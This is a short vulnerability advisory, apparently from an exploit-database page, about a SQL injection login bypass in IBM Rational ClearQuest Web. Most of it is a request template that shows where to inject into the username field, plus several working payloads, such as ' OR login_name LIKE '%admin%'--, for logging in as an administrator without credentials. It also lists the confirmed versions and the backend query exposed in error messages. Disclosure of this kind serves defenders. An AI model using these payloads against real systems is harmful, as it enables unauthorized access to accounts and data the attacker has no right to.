IBM Rational ClearQuest Web SQL Injection Login Bypass

Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+==============================================================+ + IBM Rational ClearQuest Web Login Bypass (SQL Injection) + +==============================================================+ DISCOVERED BY: ============== SecureState sasquatch - swhite (at) securestate (dot) com [email concealed] rel1k - dkennedy (at) securestate (dot) com [email concealed] HOMEPAGE: ========= AFFECTED AREA: =============== The username field on the login page is where the application is susceptible to SQL injection... SAMPLE URL: =========== http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=D ATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/l ogin&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHER E&userDb=DATABASENAMEHERE Log in as "admin": ================== ' OR login_name LIKE '%admin%'-- (other variations work as well) ' OR login_name LIKE 'admin%'-- ' OR LOWER(login_name) LIKE '%admin%'-- ' OR LOWER(login_name) LIKE 'admin%'-- etc...use your imagination... Confirmed against: ================== version Label BALTIC_PATCH.D0609.929 version Label BALTIC_PATCH.D060630 FULL SQL Statement is spit back in error message: ================================================= SELECT master_users.master_dbid, master_users.login_name, master_users.encrypted_password,, master_users.fullname,, master_users.misc_info, master_users.is_active, master_users.is_superuser, master_users.is_appbuilder, master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask FROM master_users WHERE login_name = 'INJECTION GOES HERE

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023,


Back to Top